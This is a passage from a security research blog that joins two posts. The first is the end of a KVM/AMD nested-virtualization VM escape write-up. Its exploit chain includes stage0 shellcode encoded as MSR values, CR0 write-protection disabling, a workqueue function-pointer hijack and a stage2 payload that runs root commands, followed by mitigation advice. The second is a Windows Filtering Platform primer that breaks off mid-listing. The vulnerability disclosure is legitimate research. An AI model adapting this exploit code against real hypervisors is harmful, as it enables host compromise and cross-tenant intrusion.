  • Leaking the host kernel's (or more specifically kvm-amd.ko's) base address can be done by enabling IBS sampling with a small sampling interval and immediately triggering a VM exit. When VM execution continues, the IBS result MSRs will contain the HVA of instructions executed by KVM during the exit handling.
  • The most powerful way to store data at a known HVA is to leak the location of the kernel's linear mapping (also known as physmap), a 1:1 mapping of all physical pages on the system. This gives us a GPA->HVA translation primitive by first using our GPA->HPA infoleak from above and then adding the HPA to the physmap base address. Leaking the physmap is possible by sampling micro ops in the host kernel until we find a read or write operation where the lower ~30 bits of the accessed virtual address and physical address are identical (see the sketch below).

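As a minimal sketch (my own, with a heuristic ~30-bit match threshold rather than an architectural constant), turning a matching IBS sample into the physmap base is a single subtraction:

#include <stdbool.h>
#include <stdint.h>

#define PHYSMAP_MATCH_MASK ((1ULL << 30) - 1) /* heuristic: low ~30 bits */

/* True if an IBS op sample (linear + physical address pair) looks
 * like an access through the 1:1 physmap mapping. */
static bool is_physmap_access(uint64_t lin_ad, uint64_t phys_ad) {
  return (lin_ad & PHYSMAP_MATCH_MASK) == (phys_ad & PHYSMAP_MATCH_MASK);
}

/* The physmap maps HPA x at physmap_base + x, so VA - PA is the base.
 * A GPA->HVA translation is then physmap_base + leak_guest_hpa(page). */
static uint64_t physmap_base(uint64_t lin_ad, uint64_t phys_ad) {
  return lin_ad - phys_ad;
}
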
Having all these building blocks in place, we could now try to build a kernel ROP chain that executes some interesting payload. However, there is one important caveat. When we take over execution after a vmexit, the system is still in a somewhat unstable state. As mentioned above, SVM's context switching is very minimal and we are at least one VMLOAD instruction and reenabling of interrupts away from a usable system. While it is surely possible to exploit this bug and to restore the original host context using a sufficiently complex ROP chain, I decided to find a way to run my own code instead.

A couple of years ago, the Linux physmap was still mapped executable and executing our own code would be as simple as jumping to a physmap mapping of one of our guest pages. Of course, that is not possible anymore and the kernel tries hard to not have any memory pages mapped as writable and executable. Still, page protections only apply to virtual memory accesses so why not use an instruction that directly writes controlled data to a physical address? As you might remember from our initial discussion of SVM earlier in this chapter, SVM supports an instruction called VMSAVE to store hidden guest state (or host state) in a VMCB. Similar to VMRUN, VMSAVE takes a physical address to a VMCB stored in the RAX register as an implicit argument. It then writes the following register state to the VMCB:

  • FS, GS, TR, LDTR
  • KernelGsBase
  • STAR, LSTAR, CSTAR, SFMASK
  • SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP

For us, VMSAVE is interesting for a couple of reasons:

  • It is used as part of KVM's normal SVM exit handler and can be easily integrated into a minimal ROP chain.
  • It operates on physical addresses, so we can use it to write to an arbitrary memory location, including KVM's own code.
  • All written registers still contain the guest values set by our VM, allowing us to control the written content with some restrictions.

VMSAVE's biggest downside as an exploitation primitive is that RAX needs to be page aligned, reducing our control of the target address. VMSAVE writes to the memory offsets 0x440-0x480 and 0x600-0x638, so we need to be careful about not corrupting any memory that's in use.

In our case this turns out to be a non-issue, as KVM contains a couple of code pages where functions that are rarely or never used (e.g. cleanup_module or SEV-specific code) are stored at these offsets.

While we don't have full control over the written data and valid register values are somewhat restricted, it is still possible to write a minimal stage0 shellcode to an arbitrary page in the host kernel by filling guest MSRs with the right values. My exploit uses the STAR, LSTAR and CSTAR registers for this, which are written to the physical offsets 0x400, 0x408 and 0x410. As all three registers need to contain canonical addresses, we can only use parts of the registers for our shellcode and use relative jumps to skip the unusable parts of the STAR and LSTAR MSRs:

  // mov cr0, rbx; jmp
  wrmsr(MSR_STAR, 0x00000003ebc3220f);
  // pop rdi; pop rsi; pop rcx; jmp
  wrmsr(MSR_LSTAR, 0x00000003eb595e5fULL);
  // rep movsb; pop rdi; jmp rdi;
  wrmsr(MSR_CSTAR, 0xe7ff5fa4f3);
The above code makes use of the fact that we control the value of the RBX register and the stack when we return to it as part of our initial ROP chain. First, we copy the value of RBX (0x80040033) into CR0, which disables Write Protection (WP) for kernel memory accesses. This makes all of the kernel code writable on this CPU allowing us to copy a larger stage1 shellcode to an arbitrary unused memory location and jump to it.

Once the WP bit in cr0 is disabled and the stage1 payload executes, we have a wide range of options. For my proof-of-concept exploit I decided on a somewhat boring but easy-to-implement approach to spawn a random user space command: The host is still in a very weird state so our stage1 payload can't directly call into other kernel functions, but we can easily backdoor a function pointer which will be called at some later point in time. KVM uses the kernel's global workqueue feature to regularly synchronize a VM's clock between different vCPUs. The function pointer responsible for this work is stored in the (per VM) kvm->arch data structure as kvm->arch.kvmclock_update_work. The stage1 payload overrides this function pointer with the address of a stage2 payload. To put the host into a usable state it then sets the VM_HSAVE_PA MSR back to its original value and restores RSP and RIP to call the original vmexit handler.

The final stage2 payload executes at some later point in time as part of the kernel's global work queue and uses call_usermodehelper to run an arbitrary command with root privileges.

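As an illustration of that final step, a stage2-style payload could look roughly like the following sketch. The command and wait flag are placeholders rather than the PoC's actual payload; only call_usermodehelper and the workqueue callback signature are taken from the kernel API:

#include <linux/kmod.h>
#include <linux/workqueue.h>

/* Runs in a normal kernel context via the global workqueue, so
 * calling into other kernel functions is safe again at this point. */
static void stage2_work(struct work_struct *work)
{
        static char *argv[] = { "/bin/sh", "-c", "id > /tmp/pwned", NULL };
        static char *envp[] = { "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };

        call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
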
Let's put all of this together and walk through the attack step-by-step:

  1. Prepare the stage0 payload by splitting it up and setting the right guest MSRs.
  2. Trigger the TOCTOU vulnerability in nested_svm_vmrun and free the MSR permission bitmap by disabling the SVME bit in the EFER MSR.
  3. Wait for the pages to be reused and initialized to 0 to get unrestricted MSR access.
  4. Prepare a fake host save area, a stack for the initial ROP chain and a staging memory area for the stage1 and stage2 payloads.
  5. Leak the HPA of the host save area, the HVA addresses of the stack and staging page and kvm-amd.ko's base address using the different IBS infoleaks.
  6. Redirect execution to the VMSAVE gadget by setting RIP, RSP and RAX in the fake host save area, pointing the VM_HSAVE_PA MSR at it and triggering a VM exit.
  7. VMSAVE writes the stage0 payload to an unused offset in kvm-amd's code segment; when the gadget returns, stage0 gets executed.
  8. stage0 disables Write Protection in CR0 and overwrites an unused executable memory location with the stage1 and stage2 payloads, before jumping to stage1.
  9. stage1 overwrites kvm->arch.kvmclock_update_work.work.func with a pointer to stage2 before restoring the original host context.
  10. At some later point in time kvm->arch.kvmclock_update_work.work.func is called as part of the global kernel work_queue and stage2 spawns an arbitrary command using call_usermodehelper.

Interested readers should take a look at the heavily documented proof-of-concept exploit for the actual implementation.

Conclusion

This blog post describes a KVM-only VM escape made possible by a small bug in KVM's AMD-specific code for supporting nested virtualization. Luckily, the feature that made this bug exploitable was only included in two kernel versions (v5.10, v5.11) before the issue was spotted, reducing the real-life impact of the vulnerability to a minimum. The bug and its exploit still serve as a demonstration that highly exploitable security vulnerabilities can still exist in the very core of a virtualization engine, which is almost certainly a small and well audited codebase. While the attack surface of a hypervisor such as KVM is relatively small from a pure LoC perspective, its low level nature, close interaction with hardware and pure complexity makes it very hard to avoid security-critical bugs.

While we have not seen any in-the-wild exploits targeting hypervisors outside of competitions like Pwn2Own, these capabilities are clearly achievable for a well-financed adversary. I've spent around two months on this research, working as an individual with only remote access to an AMD system. Looking at the potential ROI on an exploit like this, it seems safe to assume that more people are working on similar issues right now and that vulnerabilities in KVM, Hyper-V, Xen or VMware will be exploited in-the-wild sooner or later.

What can we do about this? Security engineers working on Virtualization Security should push for as much attack surface reduction as possible. Moving complex functionality to memory-safe user space components is a big win even if it does not help against bugs like the one described above. Disabling unneeded or unreviewed features and performing regular in-depth code reviews for new changes can further reduce the risk of bugs slipping by.

Hosters, cloud providers and other enterprises that rely on virtualization for multi-tenancy isolation should design their architecture in a way that limits the impact of an attacker with a VM escape exploit:

  • Isolation of VM hosts: Machines that host untrusted VMs should be considered at least partially untrusted. While a VM escape can give an attacker full control over a single host, it should not be easily possible to move from one compromised host to another. This requires that the control plane and backend infrastructure are sufficiently hardened and that user resources like disk images or encryption keys are only exposed to hosts that need them. One way to limit the impact of a VM escape even further is to only run VMs of a specific customer or of a certain sensitivity on a single machine.
  • Investing in detection capabilities: In most architectures, the behavior of a VM host should be very predictable, making a compromised host stick out quickly once an attacker tries to move to other systems. While it's very hard to rule out the possibility of a vulnerability in your virtualization stack, good detection capabilities make life for an attacker much harder and increase the risk of quickly burning a high-value vulnerability. Agents running on the VM host can be a first (but bypassable) detection mechanism, but the focus should be on detecting unusual network communication and resource accesses.

Understanding Network Access in Windows AppContainers

19 August 2021 at 16:37

Posted by James Forshaw, Project Zero

Recently I've been delving into the inner workings of the Windows Firewall. This is interesting to me as it's used to enforce various restrictions such as whether AppContainer sandboxed applications can access the network. Being able to bypass network restrictions in AppContainer sandboxes is interesting as it expands the attack surface available to the application, such as being able to access services on localhost, as well as granting access to intranet resources in an Enterprise.

I recently discovered a configuration issue with the Windows Firewall which allowed the restrictions to be bypassed and allowed an AppContainer process to access the network. Unfortunately Microsoft decided it didn't meet the bar for a security bulletin so it's marked as WontFix.

As the mechanism that the Windows Firewall uses to restrict access to the network from an AppContainer isn't officially documented as far as I know, I'll provide the details on how the restrictions are implemented. This will provide the background to understanding why my configuration issue allowed for network access.

I'll also take the opportunity to give an overview of how the Windows Firewall functions and how you can use some of my tooling to inspect the current firewall configuration. This will provide security researchers with the information they need to better understand the firewall and assess its configuration to find other security issues similar to the one I reported. At the same time I'll note some interesting quirks in the implementation which you might find useful.

Windows Firewall Architecture Primer

Before we can understand how network access is controlled in an AppContainer we need to understand how the built-in Windows firewall functions. Prior to XP SP2 Windows didn't have a built-in firewall, and you would typically install a third-party firewall such as ZoneAlarm. These firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers, but this was complex and error prone.

While XP SP2 introduced the built-in firewall, the basis for the one used in modern versions of Windows was introduced in Vista as the Windows Filtering Platform (WFP). However, as a user you wouldn't typically interact directly with WFP. Instead you'd use a firewall product which exposes a user interface, and then configures WFP to do the actual firewalling. On a default installation of Windows this would be the Windows Defender Firewall. If you installed a third-party firewall this would replace the Defender component but the actual firewall would still be implemented through configuring WFP.

Architectural diagram of the built-in Windows Firewall, showing a separation between user components (MPSSVC, BFE) and the kernel components (AFD, TCP/IP, NETIO and Callout Drivers)

The diagram gives an overview of how various components in the OS are connected together to implement the firewall. A user would interact with the Windows Defender firewall using the GUI, or a command line interface such as PowerShell's NetSecurity module. This interface communicates with the Windows Defender Firewall Service (MPSSVC) over RPC to query and modify the firewall rules.

MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel which is where the firewall processing is handled. The device objects (such as \Device\WFP) which the TCP/IP driver exposes are secured so that only the BFE service can access them. This means all access to the kernel firewall needs to be mediated through the service.

When an application, such as a Web Browser, creates a new network socket the AFD driver responsible for managing sockets will communicate with the TCP/IP driver to configure the socket for IP. At this point the TCP/IP driver will capture the security context of the creating process and store that for later use by the firewall. When an operation is performed on the socket, such as making or accepting a new connection, the firewall filters will be evaluated.

The evaluation is handled primarily by the NETIO driver as well as registered callout drivers. These callout drivers allow for more complex firewall rules to be implemented as well as inspecting and modifying network traffic. The drivers can also forward checks to user-mode services. As an example, the ability to forward checks to user mode allows the Windows Defender Firewall to display a UI when an unknown application listens on a wildcard address, as shown below.

Dialog displayed by the Windows Firewall service when an unknown application tries to listen for incoming connections.

The end result of the evaluation is whether the operation is permitted or blocked. The behavior of a block depends on the operation. If an outbound connection is blocked the caller is notified. If an inbound connection is blocked the firewall will drop the packets and provide no notification to the peer, such as a TCP Reset or ICMP response. This default drop behavior can be changed through a system wide configuration change. Let's dig into more detail on how the rules are configured for evaluation.

Layers, Sublayers and Filters

The firewall rules are configured using three types of object: layers, sublayers and filters as shown in the following diagram.

Diagram showing the relationship between layers, sublayers and filters. Each layer can have one or more sublayers which in turn has one or more associated filters.

The firewall layer is used to categorize the network operation to be evaluated. For example there are separate layers for inbound and outbound packets. This is typically further differentiated by IP version, so there are separate IPv4 and IPv6 layers for inbound and outbound packets. While the firewall is primarily focussed on IP traffic, there do exist limited MAC and Virtual Switch layers to perform specialist firewalling operations. You can find the list of pre-defined layers on MSDN here. As the WFP needs to know what layer handles which operation there's no way for additional layers to be added to the system by a third-party application.

When a packet is evaluated by a layer the WFP performs Filter Arbitration. This is a set of rules which determine the order of evaluation of the filters. First WFP enumerates all registered filters which are associated with the layer's unique GUID. Next, WFP groups the filters by their sublayer's GUID and orders the filter groupings by a weight value which was specified when the sublayer was registered. Finally, WFP evaluates each filter according to the order based on a weight value specified when the filter was registered.

For every filter, WFP checks if the list of conditions matches the packet and its associated meta-data. If the conditions match then the filter performs a specified action, which can be one of the following:

  • Permit
  • Block
  • Callout Terminating
  • Callout Unknown
  • Callout Inspection

If the action is Permit or Block then the filter evaluation for the current sublayer is terminated with that action as the result. If the action is a callout then WFP will invoke the filter's registered callout driver's classify function to perform additional checks. The classify function can evaluate the packet and its meta-data and specify a final result of Permit, Block or additionally Continue which indicates the filter should be ignored. In general if the action is Callout Terminating then it should only set Permit and Block, and if it's Callout Inspection then it should only set Continue. The Callout Unknown action is for callouts which might terminate or might not depending on the result of the classification.

Once a terminating filter has been evaluated WFP stops processing that sublayer. However, WFP will continue to process the remaining sublayers in the same way regardless of the final result. In general if any sublayer returns a Block result then the packet will be blocked, otherwise it'll be permitted. This means that if a higher priority sublayer's result is Permit, it can still be blocked by a lower-priority sublayer.

A filter can be configured with the FWPM_FILTER_FLAG_CLEAR_ACTION_RIGHT flag which indicates that the result should be considered "hard", allowing a higher priority filter to permit a packet in a way that can't be overridden by a lower-priority blocking filter. The rules for the final result are even more complex than I make out, including soft blocks and vetos; refer to the page in MSDN for more information.

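To make these arbitration rules concrete, here is a small illustrative model of the logic just described. It is my own simplification of the documented behavior, not NETIO's actual implementation, and it ignores soft blocks and vetoes:

#include <stdbool.h>
#include <stddef.h>

typedef enum { VERDICT_PERMIT, VERDICT_BLOCK } verdict_t;

typedef struct {
    verdict_t result; // verdict of the sublayer's first terminating filter
    bool hard;        // FWPM_FILTER_FLAG_CLEAR_ACTION_RIGHT was set
} sublayer_result_t;

// subs[] must already be sorted by descending sublayer weight.
verdict_t classify(const sublayer_result_t *subs, size_t n) {
    verdict_t final = VERDICT_PERMIT;
    for (size_t i = 0; i < n; i++) {
        if (subs[i].result == VERDICT_PERMIT && subs[i].hard)
            return VERDICT_PERMIT; // "hard" permit: lower sublayers can't block
        if (subs[i].result == VERDICT_BLOCK)
            final = VERDICT_BLOCK; // any block wins over soft permits
    }
    return final;
}
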

To simplify the classification of network traffic, WFP provides a set of stateful layers which correspond to major network events such as TCP connection and port binding. The stateful filtering is referred to as Application Layer Enforcement (ALE). For example the FWPM_LAYER_ALE_AUTH_CONNECT_V4 layer will be evaluated when a TCP connection using IPv4 is being made.

For any given connection it will only be evaluated once, not for every packet associated with the TCP connection handshake. In general these ALE layers are the ones we'll focus on when inspecting the firewall configuration, as they're the most commonly used. The three main ALE layers you're going to need to inspect are the following:

Name                                    Description
FWPM_LAYER_ALE_AUTH_CONNECT_V4/6        Processed when TCP connect() called.
FWPM_LAYER_ALE_AUTH_LISTEN_V4/6         Processed when TCP listen() called.
FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4/6    Processed when a packet/connection is received.

What layers are used and in what order they are evaluated depend on the specific operation being performed. You can find the list of the layers for TCP packets here and UDP packets here. Now, let's dig into how filter conditions are defined and what information they can check.

Filter Conditions

Each filter contains an optional list of conditions which are used to match a packet. If no list is specified then the filter will always match any incoming packet and perform its defined action. If more than one condition is specified then the filter is only matched if all of the conditions match. If you have multiple conditions of the same type they're OR'ed together, which allows a single filter to match on multiple values.

Each condition contains three values (a C sketch of a populated condition follows the list):

  • The layer field to check.
  • The value to compare against.
  • The match type, for example that the packet value and the condition value must be equal.

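As a rough illustration of these three values, here is how a single condition matching remote TCP port 80 could be populated using the documented C structures from the WFP headers (the surrounding filter setup is omitted):

#include <windows.h>
#include <initguid.h> // instantiate the condition GUIDs
#include <fwpmu.h>

// One condition entry as it would appear in a FWPM_FILTER0's
// filterCondition array: field to check, match type, and value.
void build_port_condition(FWPM_FILTER_CONDITION0 *cond) {
    cond->fieldKey = FWPM_CONDITION_IP_REMOTE_PORT; // the layer field
    cond->matchType = FWP_MATCH_EQUAL;              // how to compare
    cond->conditionValue.type = FWP_UINT16;         // value's data type
    cond->conditionValue.uint16 = 80;               // the value itself
}
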
Each layer has a list of fields that will be populated whenever a filter's conditions are checked. The field might directly reflect a value from the packet, such as the destination IP address or the interface the packet is traversing. Or it could be a metadata value, such as the user identity of the process which created the socket. Some common fields are as follows:

Field Type                              Description
FWPM_CONDITION_IP_REMOTE_ADDRESS        The remote IP address.
FWPM_CONDITION_IP_LOCAL_ADDRESS         The local IP address.
FWPM_CONDITION_IP_PROTOCOL              The IP protocol type, e.g. TCP or UDP.
FWPM_CONDITION_IP_REMOTE_PORT           The remote protocol port.
FWPM_CONDITION_IP_LOCAL_PORT            The local protocol port.
FWPM_CONDITION_ALE_USER_ID              The user's identity.
FWPM_CONDITION_ALE_REMOTE_USER_ID       The remote user's identity.
FWPM_CONDITION_ALE_APP_ID               The path to the socket's executable.
FWPM_CONDITION_ALE_PACKAGE_ID           The user's AppContainer package SID.
FWPM_CONDITION_FLAGS                    A set of additional flags.
FWPM_CONDITION_ORIGINAL_PROFILE_ID      The source network interface profile.
FWPM_CONDITION_CURRENT_PROFILE_ID       The current network interface profile.

The value to compare against the field can take different values depending on the field being checked. For example the field FWPM_CONDITION_IP_REMOTE_ADDRESS can be compared to IPv4 or IPv6 addresses depending on the layer it's used in. The value can also be a range, allowing a filter to match on an IP address within a bounded set of addresses.

The FWPM_CONDITION_ALE_USER_ID and FWPM_CONDITION_ALE_PACKAGE_ID conditions are based on the access token captured when creating the TCP or UDP socket. The FWPM_CONDITION_ALE_USER_ID condition stores a security descriptor which is used in an access check against the creator's token. If the token is granted access then the condition is considered to match. For FWPM_CONDITION_ALE_PACKAGE_ID the condition checks the package SID of the AppContainer token. If the token is not an AppContainer then the filtering engine sets the package SID to the NULL SID (S-1-0-0).

The FWPM_CONDITION_ALE_REMOTE_USER_ID condition is similar to the FWPM_CONDITION_ALE_USER_ID condition but compares against the remote authenticated user. In most cases sockets are not authenticated, however if IPsec is in use that can result in a remote user token being available to compare. It's also used in some higher-level layers such as RPC filters.

The match type can be one of the following:

  • FWP_MATCH_EQUAL
  • FWP_MATCH_EQUAL_CASE_INSENSITIVE
  • FWP_MATCH_FLAGS_ALL_SET
  • FWP_MATCH_FLAGS_ANY_SET
  • FWP_MATCH_FLAGS_NONE_SET
  • FWP_MATCH_GREATER
  • FWP_MATCH_GREATER_OR_EQUAL
  • FWP_MATCH_LESS
  • FWP_MATCH_LESS_OR_EQUAL
  • FWP_MATCH_NOT_EQUAL
  • FWP_MATCH_NOT_PREFIX
  • FWP_MATCH_PREFIX
  • FWP_MATCH_RANGE

The match types should hopefully be self explanatory based on their names. How the match is interpreted depends on the field's type and the value being used to check against.

Inspecting the Firewall Configuration

We now have an idea of the basics of how WFP works to filter network traffic. Let's look at how to inspect the current configuration. We can't use any of the normal firewall commands or UIs, such as the PowerShell NetSecurity module, since as already mentioned these represent the Windows Defender view of the firewall.

Instead we need to use the RPC APIs BFE exposes to access the configuration; for example you can access a filter using the FwpmFilterGetByKey0 API. Note that the BFE maintains security descriptors to restrict access to WFP objects. By default nothing can be accessed by non-administrators, therefore you'd need to call the RPC APIs while running as an administrator.

You could implement your own tooling to call all the different APIs, but it'd be much easier if someone had already done it for us. For built-in tools the only one I know of is using netsh with the wfp namespace. For example to dump all the currently configured filters you can use the following command as an administrator:

PS> netsh wfp show filters file = -

This will print all filters in an XML format to the console. Be prepared to wait a while for the output to complete. You can also dump straight to a file. Of course you now need to interpret the XML results. It is possible to also specify certain parameters, such as local and remote addresses to reduce the output to only matching filters.

Processing an XML file doesn't sound too appealing. To make the firewall configuration easier to inspect I've added many of the BFE APIs to my NtObjectManager PowerShell module from version 1.1.32 onwards. The module exposes various commands which will return objects representing the current WFP configuration which you can easily use to inspect and group the results however you see fit.

Layer Configuration

Even though the layers are predefined in the WFP implementation it's still useful to be able to query the details about them. For this you can use the Get-FwLayer command.

PS> Get-FwLayer

KeyName                           Name
-------                           ----
FWPM_LAYER_OUTBOUND_IPPACKET_V6   Outbound IP Packet v6 Layer
FWPM_LAYER_IPFORWARD_V4_DISCARD   IP Forward v4 Discard Layer
FWPM_LAYER_ALE_AUTH_LISTEN_V4     ALE Listen v4 Layer
...

The output shows the SDK name for the layer, if it has one, and the name of the layer that the BFE service has configured. The layer can be queried by its SDK name, its GUID or a numeric ID, which we will come back to later. As we mostly only care about the ALE layers, there's a special AleLayer parameter to query a specific layer without needing to remember the full name or ID.

PS> (Get-FwLayer -AleLayer ConnectV4).Fields

KeyName                          Type      DataType
-------                          ----      --------
FWPM_CONDITION_ALE_APP_ID        RawData   ByteBlob
FWPM_CONDITION_ALE_USER_ID       RawData   TokenAccessInformation
FWPM_CONDITION_IP_LOCAL_ADDRESS  IPAddress UInt32
...

Each layer exposes the list of fields which represent the conditions which can be checked in that layer; you can access the list through the Fields property. The output shown above contains a few of the condition types we saw earlier in the table of conditions. The output also shows the type of the condition and the data type you should provide when filtering on that condition.

PS> Get-FwSubLayer | Sort-Object Weight | Select KeyName, Weight

KeyName                                    Weight
-------                                    ------
FWPM_SUBLAYER_INSPECTION                        0
FWPM_SUBLAYER_TEREDO                            1
MICROSOFT_DEFENDER_SUBLAYER_FIREWALL            2
MICROSOFT_DEFENDER_SUBLAYER_WSH                 3
MICROSOFT_DEFENDER_SUBLAYER_QUARANTINE          4
...

You can also inspect the sublayers in the same way, using the Get-FwSubLayer command as shown above. The most useful information from the sublayer is the weight. As mentioned earlier this is used to determine the ordering of the associated filters. However, as we'll see you rarely need to query the weight yourself.

Filter Configuration

Enforcing the firewall rules is up to the filters. You can enumerate all filters using the Get-FwFilter command.

PS> Get-FwFilter

FilterId ActionType Name
-------- ---------- ----
68071    Block      Boot Time Filter
71199    Permit     @FirewallAPI.dll,-80201
71350    Block      Block inbound traffic to dmcertinst.exe
...

The default output shows the ID of a filter, the action type and the user defined name. The filter objects returned also contain the layer and sublayer identifiers as well as the list of matching conditions for the filter. As inspecting the filter is going to be the most common operation the module provides the Format-FwFilter command to format a filter object in a more readable format.

PS> Get-FwFilter -Id 71350 | Format-FwFilter
Name       : Block inbound traffic to dmcertinst.exe
Action Type: Block
Key        : c391b53a-1b98-491c-9973-d86e23ea8a84
Id         : 71350
Description:
Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : Indexed
Weight     : 549755813888
Conditions :
FieldKeyName              MatchType Value
------------              --------- -----
FWPM_CONDITION_ALE_APP_ID Equal     \device\harddiskvolume3\windows\system32\dmcertinst.exe

The formatted output contains the layer and sublayer information, the assigned weight of the filter and the list of conditions. The layer is FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 which handles new incoming connections. The sublayer is MICROSOFT_DEFENDER_SUBLAYER_WSH which is used to group Windows Service Hardening rules which apply regardless of the normal firewall configuration.

In this example the filter only matches on the socket creator process executable's path. If the filter matches, the end result is that the IPv4 TCP network connection is blocked at the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. As already mentioned, once the block is enforced it won't matter if a lower-priority sublayer would have permitted the connection.

How can we determine the ordering of sublayers and filters? You could manually extract the weights for each sublayer and filter and try and order them, and hopefully the ordering you come up with matches what WFP uses. A much simpler approach is to specify a flag when enumerating filters for a particular layer to request the BFE APIs sort the filters using the canonical ordering.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted

FilterId ActionType     Name
-------- ----------     ----
65888    Permit         Interface Un-quarantine filter
66469    Block          AppContainerLoopback
66467    Permit         AppContainerLoopback
66473    Block          AppContainerLoopback
...

The Sorted parameter specifies the flag to sort the filters. You can now go through the list of filters in order and try to work out which filter would be matched, based on some criteria you decide on. Again it'd be helpful if we could get the BFE service to do more of the hard work in figuring out what rules would apply given a particular process. For this we can specify some of the metadata that represents the connection being made and get the BFE service to only return filters which match on their conditions.

PS> $template = New-FwFilterTemplate -AleLayer ConnectV4 -Sorted
PS> $fs = Get-FwFilter -Template $template
PS> $fs.Count
65
PS> Add-FwCondition $template -ProcessId $pid
PS> $addr = Resolve-DnsName "www.google.com" -Type A
PS> Add-FwCondition $template -IPAddress $addr.Address -Port 80
PS> Add-FwCondition $template -ProtocolType Tcp
PS> Add-FwCondition $template -ConditionFlags 0
PS> $template.Conditions

FieldKeyName                     MatchType Value
------------                     --------- -----
FWPM_CONDITION_ALE_APP_ID        Equal     \device\harddisk...
FWPM_CONDITION_ALE_USER_ID       Equal     FirewallTokenInformation
FWPM_CONDITION_ALE_PACKAGE_ID    Equal     S-1-0-0
FWPM_CONDITION_IP_REMOTE_ADDRESS Equal     142.250.72.196
FWPM_CONDITION_IP_REMOTE_PORT    Equal     80
FWPM_CONDITION_IP_PROTOCOL       Equal     Tcp
FWPM_CONDITION_FLAGS             Equal     None

PS> $fs = Get-FwFilter -Template $template
PS> $fs.Count
2

To specify the metadata we need to create an enumeration template using the New-FwFilterTemplate command. We specify the Connect IPv4 layer as well as requesting that the results are sorted. Using this template with the Get-FwFilter command returns 65 results (on my machine).

Next we add some metadata, first from the current powershell process. This populates the App ID with the executable path as well as token information such as the user ID and package ID of an AppContainer. We then add details about the target connection request, specifying a TCP connection to www.google.com on port 80. Finally we add some condition flags; we'll come back to these flags later.

Using this new template results in only 2 filters whose conditions will match the metadata. Of course depending on your current configuration the number might be different. In this case 2 filters is much easier to understand than 65. If we format those two filter we see the following:

PS> $fs | Format-FwFilter
Name       : Default Outbound
Action Type: Permit
Key        : 07ba2a96-0364-4759-966d-155007bde926
Id         : 67989
Description: Default Outbound
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL
Flags      : None
Weight     : 9223372036854783936
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public
FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

Name       : Default Outbound
Action Type: Permit
Key        : 36da9a47-b57d-434e-9345-0e36809e3f6a
Id         : 67993
Description: Default Outbound
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL
Flags      : None
Weight     : 3458764513820540928

Both filters permit the connection and, based on the name, they're the default backstop when no other filters match. It's possible to configure each network profile with different default backstops. In this case the default is to permit outbound traffic. We have two of them because both match all the metadata we provided, although if we'd specified a profile other than Public then we'd only get a single filter.

Can we prove that this is the filter which matches a TCP connection? Fortunately we can: WFP supports gathering network events related to the firewall. An event includes the filter which permitted or denied the network request, and we can then compare it to our two filters to see if one of them matched. You can use the Get-FwNetEvent command to read the current circular buffer of events.

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow
PS> $s = [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)
PS> Set-FwEngineOption -NetEventMatchAnyKeywords None
PS> $ev_temp = New-FwNetEventTemplate -Condition $template.Conditions
PS> Add-FwCondition $ev_temp -NetEventType ClassifyAllow
PS> Get-FwNetEvent -Template $ev_temp | Format-List

FilterId        : 67989
LayerId         : 48
ReauthReason    : 0
OriginalProfile : Public
CurrentProfile  : Public
MsFwpDirection  : 0
IsLoopback      : False
Type            : ClassifyAllow
Flags           : IpProtocolSet, LocalAddrSet, RemoteAddrSet, ...
Timestamp       : 8/5/2021 11:24:41 AM
IPProtocol      : Tcp
LocalEndpoint   : 10.0.0.101:63046
RemoteEndpoint  : 142.250.72.196:80
ScopeId         : 0
AppId           : \device\harddiskvolume3\windows\system32\wind...
UserId          : S-1-5-21-4266194842-3460360287-487498758-1103
AddressFamily   : Inet
PackageSid      : S-1-0-0

First we enable the ClassifyAllow event, which is generated when a firewall event is permitted. By default only firewall blocks are recorded using the ClassifyDrop event to avoid filling the small network event log with too much data. Next we make a connection to the Google web server we queried earlier to generate an event. We then disable the ClassifyAllow events again to reduce the risk we'll lose the event.

Next we can query for the current stored events using Get-FwNetEvent. To limit the network events returned to us we can specify a template in a similar way to when we queried for filters. In this case we create a new template using the New-FwNetEventTemplate command and copy the existing conditions from our filter template. We then add a condition to match on only ClassifyAllow events.

Formatting the results we can see the network connection event to TCP port 80. Crucially if you compare the FilterId value to the Id fields in the two enumerated filters we match the first filter. This gives us confidence that we have a basic understanding of how the filtering works. Let's move on to running some tests to determine how the AppContainer network restrictions are implemented through WFP.

It's worth noting at this point that because the network event buffer can be small, of the order of 30-40 events depending on load, it's possible on a busy server that events might be lost before you query for them. You can avoid losing events by getting a real-time trace with the Start-FwNetEventListener command.

Callout Drivers

As mentioned, a developer can implement their own custom functionality to inspect and modify network traffic. This functionality is used by various different products, ranging from AV products scanning your network traffic for badness to NMAP's NPCAP capturing loopback traffic.

To set up a callout the developer needs to do two things. First they need to register the callout's callback functions using the FwpmCalloutRegister API in the kernel driver. Second they need to create a filter to use the callout by specifying the providerContextKey GUID and one of the action types which invoke a callout.

You can query the list of registered callouts using the FwpmCalloutEnum0 API in user-mode. I expose this API through the Get-FwCallout command.

PS> Get-FwCallout | Sort CalloutId | Select CalloutId, KeyName

CalloutId KeyName
--------- -------
        1 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V4
        2 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V6
        3 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V4
